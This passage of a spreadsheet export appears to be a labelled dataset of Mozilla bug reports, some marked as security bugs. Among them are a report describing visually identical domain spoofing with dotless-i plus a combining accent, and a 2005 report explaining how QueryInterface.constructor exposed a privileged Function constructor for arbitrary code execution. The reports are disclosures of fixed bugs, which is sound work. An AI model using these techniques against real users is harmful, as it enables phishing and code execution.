I broke this over the weekend</t>
        </is>
      </c>
      <c r="X5554" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5555">
      <c r="A5555" t="n">
        <v>1408782</v>
      </c>
      <c r="B5555" t="inlineStr">
        <is>
          <t>2017-10-15 12:15:48 -0700</t>
        </is>
      </c>
      <c r="C5555" t="inlineStr">
        <is>
          <t>Potential "visually perfect" spoofing of the letter 'i' (with or without accents) in domain names</t>
        </is>
      </c>
      <c r="D5555" t="inlineStr">
        <is>
          <t>2018-11-05 14:01:26 -0800</t>
        </is>
      </c>
      <c r="E5555" t="n">
        <v>1</v>
      </c>
      <c r="F5555" t="n">
        <v>1</v>
      </c>
      <c r="G5555" t="n">
        <v>2</v>
      </c>
      <c r="H5555" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5555" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5555" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K5555" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5555" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5555" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5555" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5555" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5555" t="inlineStr">
        <is>
          <t>[adv-main57+]</t>
        </is>
      </c>
      <c r="Q5555" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5555" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5555" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T5555" t="n">
        <v>1</v>
      </c>
      <c r="U5555" t="n">
        <v>0</v>
      </c>
      <c r="V5555" t="n">
        <v>13</v>
      </c>
      <c r="W5555" t="inlineStr">
        <is>
          <t>Created attachment 8918673
patch, don't allow IDNs with dotless-i + accent above
Any domain name that includes a letter "i" with an accent above (acute, grave, circumflex, dieresis, etc) can be perfectly spoofed using a sequence &lt;dotless i, combining accent&gt;, which is not canonically equivalent yet will display identically given reasonable font support.
For example,
  http://xn--nave-6pa.com (http://naïve.com, with precomposed i-dieresis)
could be spoofed by
  http://xn--nave-mza04z.com (http://naı̈ve.com, with dotless-i + dieresis)
on any system where the font used by the URL bar supports such combining marks (true for both macOS and Windows, AFAIK, and probably most modern systems).
IMO, this is a more important fix than some of the other potential spoofs that have been reported lately, as it does not depend on users overlooking a minor distinction, or on poor font support; rather, in the presence of fonts with good Unicode and diacritic support, the resulting spoof will (by definition) be visually perfect.
Such URLs (any that include U+0131 DOTLESS I followed by a diacritic above) should be forced to display as punycode.
(FTR, I have also filed an equivalent bug against Chromium, as their "dangerous" URL check doesn't currently catch such examples either.)</t>
        </is>
      </c>
      <c r="X5555" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5556">
      <c r="A5556" t="n">
        <v>1349766</v>
      </c>
      <c r="B5556" t="inlineStr">
        <is>
          <t>2017-03-22 16:02:46 -0700</t>
        </is>
      </c>
      <c r="C5556" t="inlineStr">
        <is>
          <t>[SeaMonkey] IndexError: list index out of range exception when loading /topcrashers/?product=SeaMonkey</t>
        </is>
      </c>
      <c r="D5556" t="inlineStr">
        <is>
          <t>2017-04-12 10:48:54 -0700</t>
        </is>
      </c>
      <c r="E5556" t="n">
        <v>1</v>
      </c>
      <c r="F5556" t="n">
        <v>1</v>
      </c>
      <c r="G5556" t="n">
        <v>4</v>
      </c>
      <c r="H5556" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5556" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5556" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K5556" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5556" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5556" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5556" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5556" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5556" t="inlineStr">
        <is>
          <t>fromAutomation</t>
        </is>
      </c>
      <c r="Q5556" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5556" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5556" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5556" t="n">
        <v>1</v>
      </c>
      <c r="U5556" t="n">
        <v>0</v>
      </c>
      <c r="V5556" t="n">
        <v>5</v>
      </c>
      <c r="W5556" t="inlineStr">
        <is>
          <t>Summary: [traceback] IndexError: list index out of range exception when loading /topcrashers/?product=SeaMonkey
(Our automation found this for both prod and staging; here's prod: https://fx-test-jenkins.stage.mozaws.net/job/socorro.prod/47/)
Steps to Reproduce:
* Load https://crash-stats.mozilla.com/topcrashers/?product=SeaMonkey or https://crash-stats.allizom.com/topcrashers/?product=SeaMonkey
Actual Results:
Traceback thrown, shown in Sentry[0] as:
IndexError: list index out of range
  File "django/core/handlers/base.py", line 132, in get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "newrelic/hooks/framework_django.py", line 499, in wrapper
    return wrapped(*args, **kwargs)
  File "crashstats/crashstats/decorators.py", line 101, in inner
    return view(request, *args, **kwargs)
  File "session_csrf/__init__.py", line 158, in wrapper
    response = f(request, *args, **kw)
  File "crashstats/crashstats/decorators.py", line 69, in inner
    return view(request, *args, **kwargs)
  File "crashstats/topcrashers/views.py", line 229, in topcrashers
    context['version'] = versions[0]
[0] https://sentry.prod.mozaws.net/operations/socorro-prod/issues/332531/</t>
        </is>
      </c>
      <c r="X5556" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5557">
      <c r="A5557" t="n">
        <v>1403853</v>
      </c>
      <c r="B5557" t="inlineStr">
        <is>
          <t>2017-09-28 01:18:58 -0700</t>
        </is>
      </c>
      <c r="C5557" t="inlineStr">
        <is>
          <t>Hide the menu button separator in popup windows</t>
        </is>
      </c>
      <c r="D5557" t="inlineStr">
        <is>
          <t>2017-10-02 08:11:30 -0700</t>
        </is>
      </c>
      <c r="E5557" t="n">
        <v>1</v>
      </c>
      <c r="F5557" t="n">
        <v>1</v>
      </c>
      <c r="G5557" t="n">
        <v>2</v>
      </c>
      <c r="H5557" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5557" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5557" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K5557" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5557" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5557" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5557" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5557" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5557" t="inlineStr">
        <is>
          <t>[reserve-photon-visual]</t>
        </is>
      </c>
      <c r="Q5557" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5557" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5557" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T5557" t="n">
        <v>1</v>
      </c>
      <c r="U5557" t="n">
        <v>0</v>
      </c>
      <c r="V5557" t="n">
        <v>8</v>
      </c>
      <c r="W5557" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1400232 +++
Popup windows have no other buttons besides the menu button, so the separator is pretty much useless.</t>
        </is>
      </c>
      <c r="X5557" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5558">
      <c r="A5558" t="n">
        <v>295011</v>
      </c>
      <c r="B5558" t="inlineStr">
        <is>
          <t>2005-05-20 22:20:22 -0700</t>
        </is>
      </c>
      <c r="C5558" t="inlineStr">
        <is>
          <t>QueryInterface() allows arbitrary code execution</t>
        </is>
      </c>
      <c r="D5558" t="inlineStr">
        <is>
          <t>2007-04-01 20:11:33 -0700</t>
        </is>
      </c>
      <c r="E5558" t="n">
        <v>1</v>
      </c>
      <c r="F5558" t="n">
        <v>1</v>
      </c>
      <c r="G5558" t="n">
        <v>3</v>
      </c>
      <c r="H5558" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5558" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5558" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K5558" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5558" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5558" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5558" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5558" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5558" t="inlineStr">
        <is>
          <t>[sg:fix] fixed by 294795. Bug details embargoed until August 1, 2005</t>
        </is>
      </c>
      <c r="Q5558" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5558" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5558" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5558" t="n">
        <v>1</v>
      </c>
      <c r="U5558" t="n">
        <v>0</v>
      </c>
      <c r="V5558" t="n">
        <v>13</v>
      </c>
      <c r="W5558" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Build Identifier: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
XPConnect wrapped native objects' "QueryInterface" method is a native
function which (erroneously) exposes the privileged Function constructor
as its constructor. Such privileged constructor can be accessed by an
expression such as "QueryInterface.constructor", and allows attackers
to construct and execute arbitrary privileged code.
Reproducible: Always
Steps to Reproduce:
1. load the testcase.
Actual Results:  
The privileged Function constructor can be accessed by
QueryInterface.constructor and allows to execute arbitary code.
Expected Results:  
The privileged Function constructor must not be accessable at all.
(QueryInterface.constructor == Function) is true.</t>
        </is>
      </c>
      <c r="X5558" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5559">
      <c r="A5559" t="n">
        <v>1591248</v>
      </c>
      <c r="B5559" t="inlineStr">
        <is>
          <t>2019-10-24 14:25:08 -0700</t>
        </is>
      </c>
      <c r="C5559" t="inlineStr">
        <is>
          <t>moz-phab should ensure that .arcrc has the right perms</t>
        </is>
      </c>
      <c r="D5559" t="inlineStr">
        <is>
          <t>2019-11-06 04:56:54 -0800</t>
        </is>
      </c>
      <c r="E5559" t="n">
        <v>1</v>
      </c>
      <c r="F5559" t="n">
        <v>1</v>
      </c>
      <c r="G5559" t="n">
        <v>7</v>
      </c>
      <c r="H5559" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5559" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J5559" t="inlineStr">
        <is>
          <t>moz-phab</t>
        </is>
      </c>
      <c r="K5559" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5559" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5559" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5559" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5559" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5559" t="inlineStr"/>
      <c r="Q5559" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5559" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5559" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5559" t="n">
        <v>1</v>
      </c>
      <c r="U5559" t="n">
        <v>0</v>
      </c>
      <c r="V5559" t="n">
        <v>2</v>
      </c>
      <c r="W5559" t="inlineStr">
        <is>
          <t>When `.arcrc` does not have `600` perms, the initial (manual) run of `arc` displays the following prompt:
```
   File permissions on your ~/.arcrc are too open. Fix them by chmod'ing to
    600? [Y/n]
```
`moz-phab` does not appear to be able to handle that prompt. Since it is already touching `.arcrc` by way of `moz-phab install-certificate`, perhaps during installation it can validate that `.arcrc`'s perms are `600` and correct them if necessary.</t>
        </is>
      </c>
      <c r="X5559" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5560">
      <c r="A5560" t="n">
        <v>605477</v>
      </c>
      <c r="B5560" t="inlineStr">
        <is>
          <t>2010-10-19 08:20:01 -0700</t>
        </is>
      </c>
      <c r="C5560" t="inlineStr">
        <is>
          <t>Contributor Dashboard</t>
        </is>
      </c>
      <c r="D5560" t="inlineStr">
        <is>
          <t>2010-11-11 16:43:46 -0800</t>
        </is>
      </c>
      <c r="E5560" t="n">
        <v>1</v>
      </c>
      <c r="F5560" t="n">
        <v>1</v>
      </c>
      <c r="G5560" t="n">
        <v>5</v>
      </c>
      <c r="H5560" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5560" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5560" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K5560" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5560" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5560" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5560" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5560" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5560" t="inlineStr"/>
      <c r="Q5560" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5560" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5560" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T5560" t="n">
        <v>1</v>
      </c>
      <c r="U5560" t="n">
        <v>0</v>
      </c>
      <c r="V5560" t="n">
        <v>4</v>
      </c>
      <c r="W5560" t="inlineStr">
        <is>
          <t>A page that lists articles in the current locale with unreviewed revisions. Sortable by things like most/least recent, sort/filterable by size of change.</t>
        </is>
      </c>
      <c r="X5560" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5561">
      <c r="A5561" t="n">
        <v>482578</v>
      </c>
      <c r="B5561" t="inlineStr">
        <is>
          <t>2009-03-10 12:12:33 -0700</t>
        </is>
      </c>
      <c r="C5561" t="inlineStr">
        <is>
          <t>top crash [@ nsSubDocumentFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;)]</t>
        </is>
      </c>
      <c r="D5561" t="inlineStr">
        <is>
          <t>2024-10-28 03:19:44 -0700</t>
        </is>
      </c>
      <c r="E5561" t="n">
        <v>1</v>
      </c>
      <c r="F5561" t="n">
        <v>1</v>
      </c>
      <c r="G5561" t="n">
        <v>3</v>
      </c>
      <c r="H5561" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5561" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5561" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5561" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5561" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5561" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5561" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5561" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5561" t="inlineStr">
        <is>
          <t>[sg:critical?] at risk</t>
        </is>
      </c>
      <c r="Q5561" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5561" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5561" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T5561" t="n">
        <v>1</v>
      </c>
      <c r="U5561" t="n">
        <v>0</v>
      </c>
      <c r="V5561" t="n">
        <v>83</v>
      </c>
      <c r="W5561" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7
(source code of page)
&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;
	&lt;head&gt;
	         &lt;title&gt;Is IE8 the end of the line for Internet Explorer? |Enterprise Desktop | Randall C. Kennedy | InfoWorld &lt;/title&gt;
		&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&gt;
		&lt;meta name="date" content="2009-03-10T03:00:00-08:00"/&gt;
&lt;meta name="description" content="Dropping IE in favor of a newer rendering engine may be not be as easy as it seems" /&gt;
		&lt;style media="all" type="text/css"&gt;@import "/script/css/blog.css";&lt;/style&gt;
		&lt;link rel="alternate" type="application/rss+xml" title="RSS" href="http://weblog.infoworld.com/enterprisedesktop/rss.xml" /&gt;
		&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://weblog.infoworld.com/enterprisedesktop/rsd.xml" /&gt;
		&lt;script language="javascript"&gt;
			var dcSite = "weblog";
			var dcZone = "/enterprisedesktop/";
			var section = "weblog";
		&lt;/script&gt;
		&lt;script type="text/javascript" src="http://www.infoworld.com/script/menu/ie6_menu_hover.js"&gt;&lt;/script&gt;
&lt;script src="http://www.infoworld.com/script/ads/dc.js" type="text/javascript"&gt;&lt;/script&gt;
&lt;script src="http://www.infoworld.com/script/tab/ajaxTabs.js" type="text/javascript"&gt;&lt;/script&gt;
&lt;script language="JavaScript" src="http://www.infoworld.com/script/omniture/s_code.js"&gt;&lt;/script&gt;
&lt;script language="JavaScript" src="http://www.infoworld.com/script/omniture/omniture_header.js"&gt;&lt;/script&gt;
		&lt;script language="javascript"&gt;
			&lt;!--
			//Omniture Config
			var catType = 'individual';
			var date = '2009-03-10';
			var author='By Randall C. Kennedy';
			var blogName = 'Enterprise Desktop | Randall C. Kennedy'; //blogName
			var category = 'MicrosoftMicrosoftMicrosoftMicrosoftMicrosoftMicrosoft'; //this might not be needed
			var title = 'Is IE8 the end of the line for Internet Explorer?';
			//--&gt;
		&lt;/script&gt;
		&lt;script language="JavaScript" src="/script/omniture/weblog.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;
s.pageName = s.pageName.replace(new RegExp("[^\x20-\x7E]",'g')," ");
if(typeof(pkeys) != 'undefined') {
	if(pkeys.length &gt; 0) {
	        if(s.events.length == 0)
			s.events="event12";
		s.products="pkey;"+pkeys.join(",pkey;");
	}
}
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--&gt;&lt;/script&gt;
&lt;script type="text/javascript"&gt;&lt;!--
if(navigator.appVersion.indexOf('MSIE')&gt;=0)document.write(unescape('%3C')+'\!-'+'-')
//--&gt;&lt;/script&gt;&lt;!--/DO NOT REMOVE/--&gt;
&lt;script language="JavaScript"&gt;
        function omnitureTrackClick(moduleName,title, obj) {
        s.prop27 = "LG article slot one - " + moduleName;
	s.prop30 = s.pageName;
        if(moduleName =='article_leadgen_top') {
                s.prop28=title;
        }else{
                s.prop29=title;
        }
        s.linkTrackVars="prop1,prop27,prop28,prop29,prop30";
        s.linkTrackEvents='None';
        s.tl(obj,'o',title);
    }
&lt;/script&gt;
	&lt;/head&gt;
	&lt;body&gt;
		&lt;div id="container"&gt;
			&lt;div id="page"&gt;
				&lt;div class="header"&gt;
	&lt;!-- BANNER/OTHER ADS --&gt;
	&lt;div style="display:none"&gt;	
&lt;script language="JavaScript" type="text/javascript"&gt;
var ord=Math.random()*10000000000000000;
&lt;/script&gt;
&lt;!-- IFW 1x1 TRACKING --&gt;
&lt;img src="http://ad.doubleclick.net/ad/idg.us.info.pixel/ifw;sz=1x1;ord=485711100309?" border="0" height="1" width="1"/&gt;
&lt;!-- PEEL AD (tile=14) --&gt;
&lt;script language="JavaScript" type="text/javascript"&gt;
        document.write('&lt;script language="JavaScript" src="http://ad.doubleclick.net/adj/idg.us.info.peelback/;pos=peelback;tile=14;dcopt=ist;sz=1x1;ord=' + ord + '?" type="text/javascript"&gt;&lt;\/script&gt;');
&lt;/script&gt;
&lt;noscript&gt;
        &lt;a href="http://ad.doubleclick.net/jump/idg.us.info.peelback/;pos=peelback;tile=14;sz=1x1;ord=485711100309?" target="_blank"&gt;
                &lt;img src="http://ad.doubleclick.net/ad/idg.us.info.peelback/;pos=peelback;tile=14;sz=1x1;ord=485711100309?" width="1" height="1" border="0" alt=""&gt;
        &lt;/a&gt;
&lt;/noscript&gt;
&lt;!-- PRESTITIAL AD (tile=15) --&gt;
&lt;script language="JavaScript" type="text/javascript"&gt;
        document.write('&lt;script language="JavaScript" src="http://ad.doubleclick.net/adj/idg.us.info.prestitial/;pos=interstitial;tile=15;dcopt=ist;sz=1x1;ord=' + ord + '?" type="text/javascript"&gt;&lt;\/script&gt;');
&lt;/script&gt;
&lt;noscript&gt;
        &lt;a href="http://ad.doubleclick.net/jump/idg.us.info.prestitial/;pos=interstitial;tile=15;sz=1x1;ord=485711100309?" target="_blank"&gt;
                &lt;img src="http://ad.doubleclick.net/ad/idg.us.info.prestitial/;pos=interstitial;tile=15;sz=1x1;ord=485711100309?" width="1" height="1" border="0" alt=""&gt;
        &lt;/a&gt;
&lt;/noscript&gt;
	&lt;/div&gt;&lt;!--end div display:none--&gt;
	&lt;div class="f-left" href="#"&gt;	
		&lt;!-- begin ad tag  (728x90) --&gt;
&lt;SCRIPT LANGUAGE="JavaScript"&gt;
adCallJS("728","90","leader");
&lt;/SCRIPT&gt;
&lt;NOSCRIPT&gt;
  &lt;A HREF="http://ad.doubleclick.net/jump/idg.us.info.general/noscript;pos=leader;tile=1;sz=728x90;ord=123456789?" TARGET="_blank"&gt;
  &lt;IMG SRC="http://ad.doubleclick.net/ad/idg.us.info.general/noscript;pos=leader;tile=1;sz=728x90;ord=123456789?" WIDTH="728" HEIGHT="90" BORDER="0" ALT=""&gt;&lt;/A&gt;
&lt;/NOSCRIPT&gt;
&lt;!-- End ad tag --&gt;
	&lt;/div&gt;
	&lt;!-- NL BOX --&gt;
		&lt;div class="news f-right"&gt;
		&lt;p&gt;Free Newsletters&lt;/p&gt;
		&lt;form action="http://www.infoworld.com/newsletter/signup/recaptcha-php-1.10/subscribe.php" method="get" style="padding:0px; margin:0px"&gt;
			&lt;div class="news-form"&gt;
				&lt;label&gt;&lt;input type="checkbox" class="check" value="infoworld_todays_headlines" id="list[]" name="list[]" /&gt;Today's Headline&lt;/label&gt;
				&lt;span style="float: left;"&gt;&lt;input type="text" class="text" name="email[]" value="Enter Email Address" onFocus="this.value=''" /&gt;&amp;nbsp;&amp;nbsp;&lt;input type="submit" value="Submit" class="blackVrdMed" valign="top" style="font-size: 11px;" /&gt;&lt;/span&gt;
&lt;!--&lt;input type="checkbox" class="check" name="freeNLTP" id="freeNLTP" CHECKED /&gt; &amp;nbsp;&amp;nbsp; &lt;label&gt;&lt;a href="http://www.infoworld.com/about/terms.html" target="_blank"&gt;Terms of Service&lt;/a&gt; and &lt;a href="http://www.infoworld.com/about/abt_prv.html" target="_blank"&gt;Privacy Policy&lt;/a&gt;&lt;/label&gt;--&gt;
			&lt;/div&gt;&lt;!--end div news-form--&gt;
		&lt;/form&gt;
	&lt;/div&gt;&lt;!--end div news f-left--&gt;
&lt;/div&gt;&lt;!--end div header--&gt;
&lt;div class="header_bg"&gt;
	&lt;!-- LOGIN/SEARCH --&gt;
		&lt;div class="long-box"&gt;
		&lt;a class="mainlogo f-left" href="http://www.infoworld.com/"&gt;Infoworld&lt;/a&gt;
		&lt;div class="login"&gt;
		&lt;/div&gt;&lt;!--end div login--&gt;
		&lt;br /&gt;
		&lt;form name="ultraseek" action="http://search.infoworld.com/query.html" accept-charset="iso-8859-1" class="searchbox" size="16" method="GET"&gt;
			&lt;div class="search f-right"&gt;
				&lt;input type="text"  name="qt" id="search" size="25" value="" maxlength="1991" class="text" /&gt;
				&lt;input type="image" src="http://www.infoworld.com/img/blog/search-btn.gif" title="Search" class="button" /&gt;
			&lt;/div&gt;&lt;!--end div search f-right--&gt;
		&lt;/form&gt;
	&lt;/div&gt;&lt;!--end div long-box--&gt;
	&lt;!-- NAV MENU --&gt;
		&lt;ul class="menu" id="navigation"&gt;
	&lt;li class="nodrop"&gt;
	&lt;a href="http://www.infoworld.com/" class="home"&gt;HOME&lt;/a&gt;   
	&lt;/li&gt;
	&lt;li&gt;
	&lt;a href="http://www.infoworld.com/news/"&gt;NEWS&lt;/a&gt;
	&lt;ul&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/news/"&gt;Today's Headlines&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/daily/"&gt;InfoWorld Daily&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/archives/t.jsp?N=s"&gt;Special Reports&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/newsletter/subscribe.html"&gt;Newsletters&lt;/a&gt;&lt;/li&gt;
	&lt;/ul&gt;
	&lt;/li&gt;
	&lt;li&gt;
	&lt;a href="http://www.infoworld.com/testcenter/"&gt;TEST CENTER&lt;/a&gt;
	&lt;ul&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/archives/t.jsp?N=t&amp;V=Review"&gt;Latest Reviews&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/testcenter/"&gt;Review Finder&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/archives/t.jsp?N=p"&gt;Top Rated Products&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/tcdaily/"&gt;Test Center Daily Blog&lt;/a&gt;&lt;/li&gt;
	&lt;/ul&gt;
	&lt;/li&gt;
	&lt;li&gt;
	&lt;a href="http://www.infoworld.com/techindex/"&gt;TECHNOLOGIES&lt;/a&gt;
	&lt;ul&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/archives/t.jsp?N=i&amp;V=Application%20development"&gt;App Dev&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/archives/t.jsp?N=i&amp;V=Applications"&gt;Applications&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/topic-center/data-protection/"&gt;Data Protection&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/topic-center/green-tech/"&gt;Green Tech&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="http://www.infoworld.com/archives/t.jsp?N=i&amp;V=Hardware"&gt;Hardware&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/archives/t.jsp?N=i&amp;V=Networking"&gt;Networking&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="http://www.infoworld.com/archives/t.jsp?N=i&amp;V=Wireless"&gt;Mobile&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/topic-center/open-sources/"&gt;Open Source&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;&lt;a href="http://www.infoworld.com/archives/t.jsp?N=l&amp;V=Security"&gt;Security&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/topic-center/soa/"&gt;SOA&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/archives/t.jsp?N=i&amp;V=Storage"&gt;Storage&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.infoworld.com/topic-center/virtualization/"&gt;Virtualization&lt;/a&gt;&lt;/li&gt;    
	&lt;/ul&gt;
	&lt;/li&gt;
	&lt;li&gt;
	&lt;a href="http://weblog.infoworld.com/"&gt;BLOGS&lt;/a&gt;
	&lt;ul&gt;
	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/robertxcringely/"&gt;Cringely: Notes from the Field&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://weblog.infoworld.com/securityadviser/"&gt;Grimes: Security Adviser&lt;/a&gt;&lt;/li&gt;
